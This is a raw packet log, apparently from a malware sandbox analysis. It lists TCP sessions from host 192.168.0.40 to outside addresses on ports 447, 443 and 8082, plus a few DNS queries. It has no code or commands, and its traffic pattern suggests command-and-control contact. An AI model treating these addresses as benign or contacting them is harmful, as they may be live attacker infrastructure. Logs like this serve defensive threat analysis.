Jan 20, 2020 14:20:30.430346012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430449963 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430561066 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430660963 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.430672884 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430762053 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430866957 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.435738087 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.435852051 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.435925007 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.435976982 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.436110020 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.436113119 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.436233044 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.436278105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.436403036 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.441978931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.442001104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.442156076 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.442245960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.442270994 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.442315102 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.442420006 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.448020935 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448134899 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448136091 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.448230028 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448357105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448424101 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.448473930 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448596001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448612928 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.448653936 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448812008 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448829889 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.448854923 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.448972940 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449034929 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.449101925 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449264050 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449301004 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.449367046 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449511051 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449529886 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.449635983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449728966 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449807882 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.449899912 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.449923038 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450021029 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450067997 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.450200081 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450248957 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450324059 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.450421095 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450534105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450572968 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450603008 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.450700045 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450773001 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.450815916 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450911999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.450994968 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.451108932 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.451210022 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.451284885 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.451320887 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.451415062 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.451462030 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.451482058 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.451572895 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.532210112 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:36.850961924 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:36.854008913 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:36.854064941 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:36.854285955 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:36.854876041 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:36.854897976 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:36.911123037 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:36.912458897 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:36.912492990 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:36.915077925 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:36.915107965 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.156415939 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.669565916 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.669605017 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.669790983 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.670339108 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.670356989 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.723753929 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.725162983 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.725198984 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.727885962 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.727917910 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.727931023 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:37.727941990 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:37.764820099 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:38.965934038 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.068361998 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.266586065 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.266917944 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.267199993 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.267221928 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.267328978 CET	49194	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.267339945 CET	443	49194	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.534818888 CET	49196	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.534874916 CET	443	49196	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.534998894 CET	49196	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.535269022 CET	49196	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.535291910 CET	443	49196	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.595087051 CET	443	49196	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.596179008 CET	49196	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.596213102 CET	443	49196	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:40.598778963 CET	49196	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:40.598809958 CET	443	49196	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:41.367748976 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:41.368212938 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:41.566304922 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:41.566751957 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.678031921 CET	443	49196	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:42.682142019 CET	49196	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.685410023 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.685463905 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:42.685686111 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.686243057 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.686268091 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:42.741700888 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:42.743030071 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.743065119 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:42.745769978 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:42.745800972 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:43.679234028 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:43.679286003 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:43.679389000 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:43.679577112 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:43.679600000 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:43.736959934 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:43.737433910 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:43.737454891 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:43.738266945 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:43.738281965 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:43.738289118 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:43.738296032 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:44.379189968 CET	49195	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:44.379230976 CET	443	49195	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:46.172840118 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.694756031 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.694809914 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:46.695008039 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.695657015 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.695698977 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:46.752996922 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:46.754295111 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.754317999 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:46.756962061 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.756993055 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:46.757008076 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:46.757016897 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:49.708761930 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:49.708817005 CET	443	49200	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:49.709032059 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:49.709507942 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:49.709532976 CET	443	49200	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:49.762003899 CET	443	49200	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:49.762866974 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:49.762888908 CET	443	49200	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:49.765024900 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:49.765055895 CET	443	49200	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:49.765069962 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:49.765079021 CET	443	49200	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:52.734747887 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:52.734771967 CET	443	49201	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:52.734927893 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:52.735210896 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:52.735217094 CET	443	49201	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:52.792588949 CET	443	49201	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:52.793323994 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:52.793332100 CET	443	49201	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:52.794384956 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:52.794389963 CET	443	49201	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:52.794416904 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:52.794420958 CET	443	49201	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:54.595406055 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:54.794284105 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:54.794517994 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:55.477953911 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:55.678678989 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:55.678860903 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:55.679075003 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:55.679084063 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:55.679183960 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:55.679188013 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:55.679212093 CET	49197	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:55.679214954 CET	443	49197	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:55.712820053 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.732889891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.766649961 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:55.902884960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.902909994 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.902987003 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903031111 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903059959 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.903104067 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903182030 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.903418064 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903440952 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903460979 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903539896 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.903753042 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903774977 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.903955936 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.922723055 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923501968 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923522949 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923666954 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923686028 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.923744917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923768997 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923985004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.923993111 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.924005985 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.924160004 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:55.924166918 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.924220085 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:55.924418926 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:56.947285891 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.128056049 CET	49202	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.128103971 CET	443	49202	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.128190041 CET	49202	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.128397942 CET	49202	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.128420115 CET	443	49202	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.146704912 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.147377968 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.180630922 CET	443	49202	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.181204081 CET	49202	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.181225061 CET	443	49202	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.181982040 CET	49202	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.181997061 CET	443	49202	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:57.591844082 CET	49198	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:57.591880083 CET	443	49198	5.2.78.43	192.168.0.40
Jan 20, 2020 14:20:59.948820114 CET	49199	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:59.948844910 CET	443	49199	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.081165075 CET	49203	8082	192.168.0.40	203.176.135.102
Jan 20, 2020 14:21:01.509500027 CET	8082	49203	203.176.135.102	192.168.0.40
Jan 20, 2020 14:21:01.509825945 CET	49203	8082	192.168.0.40	203.176.135.102
Jan 20, 2020 14:21:01.510344982 CET	49203	8082	192.168.0.40	203.176.135.102
Jan 20, 2020 14:21:01.510432959 CET	49203	8082	192.168.0.40	203.176.135.102
Jan 20, 2020 14:21:01.765739918 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:01.765795946 CET	443	49204	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.766004086 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:01.766598940 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:01.766622066 CET	443	49204	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.821445942 CET	443	49204	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.822856903 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:01.822890997 CET	443	49204	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.825433016 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:01.825464010 CET	443	49204	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.825478077 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:01.825485945 CET	443	49204	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:01.932904005 CET	8082	49203	203.176.135.102	192.168.0.40
Jan 20, 2020 14:21:01.932929993 CET	8082	49203	203.176.135.102	192.168.0.40
Jan 20, 2020 14:21:01.934410095 CET	8082	49203	203.176.135.102	192.168.0.40
Jan 20, 2020 14:21:01.934437037 CET	8082	49203	203.176.135.102	192.168.0.40
Jan 20, 2020 14:21:01.934756994 CET	49203	8082	192.168.0.40	203.176.135.102
Jan 20, 2020 14:21:01.935029984 CET	49203	8082	192.168.0.40	203.176.135.102
Jan 20, 2020 14:21:02.347407103 CET	8082	49203	203.176.135.102	192.168.0.40
Jan 20, 2020 14:21:03.925685883 CET	49200	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:03.925750971 CET	49201	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:03.925816059 CET	49202	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:03.926125050 CET	49204	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.769382954 CET	49205	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.769417048 CET	443	49205	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.769530058 CET	49205	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.769882917 CET	49205	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.769896030 CET	443	49205	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.824335098 CET	443	49205	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.825001955 CET	49205	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.825016975 CET	443	49205	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.826364994 CET	49205	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.826370955 CET	443	49205	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.826375008 CET	49205	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.826378107 CET	443	49205	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.939630985 CET	49206	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939651966 CET	49207	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939683914 CET	443	49206	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.939691067 CET	443	49207	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.939774036 CET	49208	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939791918 CET	443	49208	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.939824104 CET	49206	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939826012 CET	49207	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939912081 CET	49208	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939981937 CET	49207	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.939997911 CET	443	49207	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.940027952 CET	49206	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.940063000 CET	443	49206	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.940104008 CET	49208	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.940119028 CET	443	49208	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.992470026 CET	443	49207	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.992963076 CET	49207	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.992976904 CET	443	49207	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.993819952 CET	49207	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.993830919 CET	443	49207	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.993839025 CET	49207	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.993845940 CET	443	49207	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.994689941 CET	443	49206	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.995114088 CET	49206	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.995136023 CET	443	49206	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.995857954 CET	49206	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.995867968 CET	443	49206	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.995876074 CET	49206	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.995882034 CET	443	49206	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.996294975 CET	443	49208	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.996764898 CET	49208	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.996800900 CET	443	49208	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.997376919 CET	49208	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.997396946 CET	443	49208	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:04.997409105 CET	49208	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:04.997416973 CET	443	49208	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:07.779191017 CET	49209	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:07.779249907 CET	443	49209	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:07.779361010 CET	49209	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:07.779598951 CET	49209	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:07.779623985 CET	443	49209	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:07.838150978 CET	443	49209	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:07.838746071 CET	49209	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:07.838762045 CET	443	49209	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:07.839828014 CET	49209	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:07.839837074 CET	443	49209	5.2.78.43	192.168.0.40
Jan 20, 2020 14:21:07.839864969 CET	49209	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:21:07.839876890 CET	443	49209	5.2.78.43	192.168.0.40

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 20, 2020 14:15:19.638164043 CET	59774	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:15:19.654655933 CET	53	59774	8.8.8.8	192.168.0.40
Jan 20, 2020 14:15:20.640150070 CET	59774	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:15:20.657044888 CET	53	59774	8.8.8.8	192.168.0.40
Jan 20, 2020 14:15:21.653954029 CET	59774	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:15:21.670841932 CET	53	59774	8.8.8.8	192.168.0.40
Jan 20, 2020 14:15:23.666471004 CET	59774	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:15:23.684103966 CET	53	59774	8.8.8.8	192.168.0.40
Jan 20, 2020 14:15:27.675607920 CET	59774	53	192.168.0.40	8.8.8.8
